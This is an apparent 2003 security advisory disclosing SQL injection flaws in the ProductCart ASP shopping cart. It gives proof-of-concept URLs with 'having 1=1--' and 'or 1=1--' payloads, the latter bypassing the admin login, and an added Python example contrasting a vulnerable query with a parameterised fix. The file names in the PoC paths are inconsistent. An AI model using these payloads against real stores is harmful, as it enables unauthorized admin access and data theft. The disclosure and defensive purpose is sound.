Packet Storm, PACKETSTORM:31330 (author: Bosen)
Posted Jul 07, 2003 - 12:00 a.m.

bosen-adv.7.txt

2003-07-07 00:00:00
Bosen
packetstormsecurity.com
`$Id: bosen-adv.7,v1 25/06/2003 bosen Exp $  
  
1ndonesian Security Team (1st)  
Bosen Advisory #7 ProductCart SQL Injection  
25/06/2003  
  
  
  
  
ProductCart SQL Injection Vulnerability  
_______________________________________________________________________________  
  
  
1ndonesian Security Team (1st)  
http://bosen.net/releases/  
==============================================================================================  
Security Advisory  
  
  
  
Advisory Name: ProductCart SQL Injection Vulnerability  
Release Date: 06/20/2003  
Application:   
ProductCart v1.5   
ProductCart v1.5002   
ProductCart v1.5003   
ProductCart v1.5003r   
ProductCart v1.5004   
ProductCart v1.6b   
ProductCart v1.6br   
ProductCart v1.6br001   
ProductCart v1.6br003  
ProductCart v1.6b001  
ProductCart v1.6b002   
ProductCart v1.6b003   
ProductCart v1.6002  
ProductCart v1.6003  
ProductCart v2  
ProductCart v2br000   
Platform: Win32/MSSQL  
Severity: High  
BUG Type: SQL Injection  
Author: Bosen <[email protected]>  
Discovered by: Bosen <[email protected]>  
Vendor Status: See below.  
Vendor URL: http://www.earlyimpact.com/  
Reference: http://bosen.net/releases/  
  
  
  
Overview:  
From the web  
"ProductCart® is an ASP shopping cart that combines sophisticated ecommerce   
features with time-saving store management tools and remarkable ease of use."  
From the author  
"Even though the application is not Open Source, we can 'debug' the application  
on the fly. And with SQL Injection we can query some information about the tables  
and database, even the data itself. With more work this will cause the ability to access   
the admin control panel site."  
  
  
  
Details:  
The application handles its error messages quite well, but not well enough: the error  
pages still have an XSS injection vulnerability (read my previous advisories). Those error  
handlers would make exploitation very difficult to do.  
But not every script is covered by the error handler script.   
For example, Custva.asp is still vulnerable to SQL Injection.  
  
Worse still, the admin control panel can be injected with the old, well-known   
SQL injection 'or 1=1--'. This gets you into the admin control panel  
without needing any credentials.  
  
  
Exploits/POC:  
file Custva.asp  
http://<target>/productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email  
&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit  
  
file login.asp  
http://<target>/produccart/pdacmin/login.asp?idadmin='' or 1=1--  
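As an added example (not ProductCart's code), here is the login check behind the admin-panel finding in Details: the concatenated query that the page's 'or 1=1--' payload defeats, beside the parameterised form that closes the hole. An in-memory SQLite database and the `admins(idadmin, password)` table are assumptions standing in for the MSSQL backend, so the MSSQL-specific error-message leakage used in the Custva.asp POC is not reproduced here.

```python
import sqlite3

# Added example, not ProductCart code. SQLite stands in for MSSQL, and the
# table/column names are assumed for illustration only.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admins (idadmin TEXT, password TEXT)")
    con.execute("INSERT INTO admins VALUES ('admin', 's3cret')")  # constructed row
    return con


def build_vulnerable_sql(idadmin: str, password: str) -> str:
    """Splices request parameters straight into the SQL text, the pattern behind
    the login.asp finding. Returned as a string so it can be inspected."""
    return ("SELECT idadmin FROM admins WHERE idadmin='" + idadmin
            + "' AND password='" + password + "'")


def login_vulnerable(con: sqlite3.Connection, idadmin: str, password: str) -> bool:
    # With idadmin = "' or 1=1--" the WHERE clause collapses to "idadmin='' or 1=1"
    # and the password comparison is commented out, so a row always comes back.
    return con.execute(build_vulnerable_sql(idadmin, password)).fetchone() is not None


def login_fixed(con: sqlite3.Connection, idadmin: str, password: str) -> bool:
    """Parameterised query: the values travel separately from the SQL text, so a
    quote or a '--' in the input is compared as data, never parsed as syntax."""
    sql = "SELECT idadmin FROM admins WHERE idadmin=? AND password=?"
    return con.execute(sql, (idadmin, password)).fetchone() is not None


if __name__ == "__main__":
    con = make_db()
    payload = "' or 1=1--"  # the advisory's 'or 1=1--' injection
    print(build_vulnerable_sql(payload, "x"))
    print("vulnerable login bypassed:", login_vulnerable(con, payload, "x"))  # True
    print("fixed login bypassed:     ", login_fixed(con, payload, "x"))       # False
```

Printing the concatenated statement shows exactly why the bypass works: everything after `--` is gone, including the password check.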
  
  
  
Vendor Response:  
Contacted.   
A quick fix has been released.  
http://www.earlyimpact.com/productcart/support/security-alert-070403.asp  
  
  
Recommendation:  
A quick patch is posted at:  
http://www.zone-h.org/en/advisories/read/id=2611/  
http://www.earlyimpact.com/productcart/support/security-alert-070403.asp  
  
  
  
1ndonesian Security Team (1st) Advisory:  
http://bosen.net/releases/  
  
  
  
About 1ndonesian Security Team:  
1ndonesian Security Team researches and develops intelligent, advanced application  
security assessments. Based in Indonesia, 1ndonesian Security Team offers best-of-  
breed security consulting services, specialising in application, host and network  
security assessments.  
  
1st provides security information and patches for use by the entire 1st community.  
  
This information is provided freely to all interested parties and may be   
redistributed provided that it is not altered in any way, 1st is appropriately   
credited and the document retains.  
  
  
Greetz to:  
AresU, TioEuy, sakitjiwa, muthafuka, alphacentury   
All 1ndonesian Security Team - #[email protected]/centrin.net.id  
  
  
  
  
  
  
  
Bosen <[email protected]>  
======================  
Original document can be found at http://bosen.net/releases/?id=40  
`